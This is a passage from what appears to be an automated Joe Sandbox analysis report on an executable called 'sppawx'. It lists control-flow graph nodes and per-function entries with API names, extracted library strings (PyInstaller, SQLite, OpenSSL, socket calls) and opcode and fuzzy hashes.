7ff79a32bead-7ff79a32beb6 GetLastError 1979->1981 1980->1981 1987 7ff79a32bdc7 1980->1987 1990 7ff79a32beb8-7ff79a32bece call 7ff79a324f78 call 7ff79a324f58 1981->1990 1991 7ff79a32bed3-7ff79a32bed6 1981->1991 1982->1979 1989 7ff79a32bd3f-7ff79a32bd61 ReadConsoleW 1982->1989 1992 7ff79a32bd73-7ff79a32bd7d call 7ff79a32a9b8 1983->1992 1984->1958 1993 7ff79a32bcd3-7ff79a32bcdf 1984->1993 1985->1955 1986->1983 1995 7ff79a32bdce-7ff79a32bde3 1987->1995 1997 7ff79a32bd82-7ff79a32bd8c 1989->1997 1998 7ff79a32bd63 GetLastError 1989->1998 1990->1983 2002 7ff79a32bd69-7ff79a32bd6b call 7ff79a324eec 1991->2002 2003 7ff79a32bedc-7ff79a32bede 1991->2003 1992->1941 1993->1958 2001 7ff79a32bce1-7ff79a32bce3 1993->2001 1995->1992 2006 7ff79a32bde5-7ff79a32bdf0 1995->2006 1997->1995 1998->2002 2001->1958 2010 7ff79a32bce5-7ff79a32bcf5 2001->2010 2002->1983 2003->1992 2012 7ff79a32be17-7ff79a32be1f 2006->2012 2013 7ff79a32bdf2-7ff79a32be0b call 7ff79a32b6e4 2006->2013 2010->1958 2016 7ff79a32be9b-7ff79a32bea8 call 7ff79a32b524 2012->2016 2017 7ff79a32be21-7ff79a32be33 2012->2017 2020 7ff79a32be10-7ff79a32be12 2013->2020 2016->2020 2021 7ff79a32be8e-7ff79a32be96 2017->2021 2022 7ff79a32be35 2017->2022 2020->1992 2021->1992 2024 7ff79a32be3a-7ff79a32be41 2022->2024 2025 7ff79a32be7d-7ff79a32be88 2024->2025 2026 7ff79a32be43-7ff79a32be47 2024->2026 2025->2021 2027 7ff79a32be49-7ff79a32be50 2026->2027 2028 7ff79a32be63 2026->2028 2027->2028 2030 7ff79a32be52-7ff79a32be56 2027->2030 2029 7ff79a32be69-7ff79a32be79 2028->2029 2029->2024 2031 7ff79a32be7b 2029->2031 2030->2028 2032 7ff79a32be58-7ff79a32be61 2030->2032 2031->2021 2032->2029
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                              • Instruction ID: 11b114a80602d514dd58e9dceae7d7d1c247fc3b977190388b0f37f93051e6a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99C1C32290E78692F770AF3594482BDB764EB81B80FD541BDEE4E077A5CE7CE8458720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: setsockopt
                                                                                                                                                                                                                              • String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
                                                                                                                                                                                                                              • API String ID: 3981526788-1608436615
                                                                                                                                                                                                                              • Opcode ID: 6a71c4d31bb7b70cba93c4add455e8d7ddfed6c2ff97cc618a081cd4a75b7a58
                                                                                                                                                                                                                              • Instruction ID: bb3d699b2e2dd794c60731d2e81652bd9d2c6d37fdb914be9125c49ed805c737
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a71c4d31bb7b70cba93c4add455e8d7ddfed6c2ff97cc618a081cd4a75b7a58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15410B31A08B86A6EB708B11E4446AE7361FBC9BA4F580132DA5D43F74EF3DD548CB44
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction ID: 46f8135214d4901e76f154056be3ef0838f3a313fe8241fec1de31a919c01be0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61415C61B0EA8691FA31EB71E4552EAB351FB44384FC0417EEA5D43696EF3CE609C360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007$CreateFile
                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                              • API String ID: 4190464644-3829269058
                                                                                                                                                                                                                              • Opcode ID: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
                                                                                                                                                                                                                              • Instruction ID: 4338921ea1f4e235a871f727d5b353c7f9f2707bb2631de8ff542885270f7048
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4024E21A4D64286FAB58F21E89427DA3A4FF94B94F0C0636DA5D46EB4EF7CE4498700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$connect
                                                                                                                                                                                                                              • String ID: 3'
                                                                                                                                                                                                                              • API String ID: 375857812-280543908
                                                                                                                                                                                                                              • Opcode ID: 8fbe942215a69ff07f7e94bc13478a0332a10ad1db4b1f47bfbad09f857d53ed
                                                                                                                                                                                                                              • Instruction ID: 6e1ff27f8dfb73a2b9b6bc99584e322ead3e489db805f2af91e3a1731bae185d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fbe942215a69ff07f7e94bc13478a0332a10ad1db4b1f47bfbad09f857d53ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3316231B08B4296E7705F25A85457D6694BFD47B8F080137EE9E82FB5EF3CE4428600
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cert$Store$00007CertificateCertificatesCloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2716309604-0
                                                                                                                                                                                                                              • Opcode ID: ede5967ba143f5375be10210da6bbb9a510fe03299ea453ea1123846b6fffd8f
                                                                                                                                                                                                                              • Instruction ID: 3abd26431c138c738098443ac9bfd8697c21ea1f9c9266aa323bfc6a869338c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ede5967ba143f5375be10210da6bbb9a510fe03299ea453ea1123846b6fffd8f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24811A35E0970286EA35AF259A1813D63A5FFC4B95F4C453ACA0E06FB1FE3EE4569700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1995843185-0
                                                                                                                                                                                                                              • Opcode ID: 14e9d6f20bcf662a5dc976c779a8626d1d0426be9f2da94a963353ed828a26b9
                                                                                                                                                                                                                              • Instruction ID: 50e72d3691635559913610a52013a4fbf960ffafef0f1bc334a0ba0b70bebd66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14e9d6f20bcf662a5dc976c779a8626d1d0426be9f2da94a963353ed828a26b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8214F36B1875186E7748B16A94472DA7A1FBC4F80F48403ACE4D53F64EF3CE4169600
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                              • API String ID: 0-3764764234
                                                                                                                                                                                                                              • Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                                                                              • Instruction ID: b60e5ea8165b0f55265a47320ff4805caa0a8ed499ddb36b53dd618bbb30bd7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3711F22A0864685FA759B16D4443BEB3A1EBD4B84F9C6537CA5D47EB5FF3CE8418300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007FileRead
                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                              • API String ID: 3505667475-1843600136
                                                                                                                                                                                                                              • Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                                                                              • Instruction ID: 6eee181cbf011acdba92472f78ae3d6cb709545c3fb9b57d8eb1dcdf7a02f049
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C941E132A08A4286E230DF25E8445BDB365FB94780F5D4537EA5E43EB4EF3CE9469740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction ID: 99208a7bd62d03fe223c48bba9b6c9d1b163a6a2775e67259bef1c964edd8153
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2541A122D1978283F360AB319654379B260FB947A4F50937DEA9C03ED6DF7CA5E08760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                              • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                              • Opcode ID: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
                                                                                                                                                                                                                              • Instruction ID: d337b8372069a9c943e34c72748f68f90760c0ace0bb12c17887ccaec3904741
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F916B21B8865286FB50DF29E6507BD26A0EB44BD8F584236DB0C0AEE4DF38D847C752
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction ID: b07bad99604f84b8c779a92eeb66fd4874df6644f4aadefcc57f7713f9911625
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4311721E0E24256FA74FB7594A23B9B791AF42384FC408BDE94E472D7DE2CA815C271
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: d8b417cf92a97ddbce5fa69e19d74c33bcd8ac60ee2922ea736eb7179b7db9aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D51E661B0B24296F738BE36940067AF291AF46BA4F94477DEE6C437C5CF3CE9058620
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
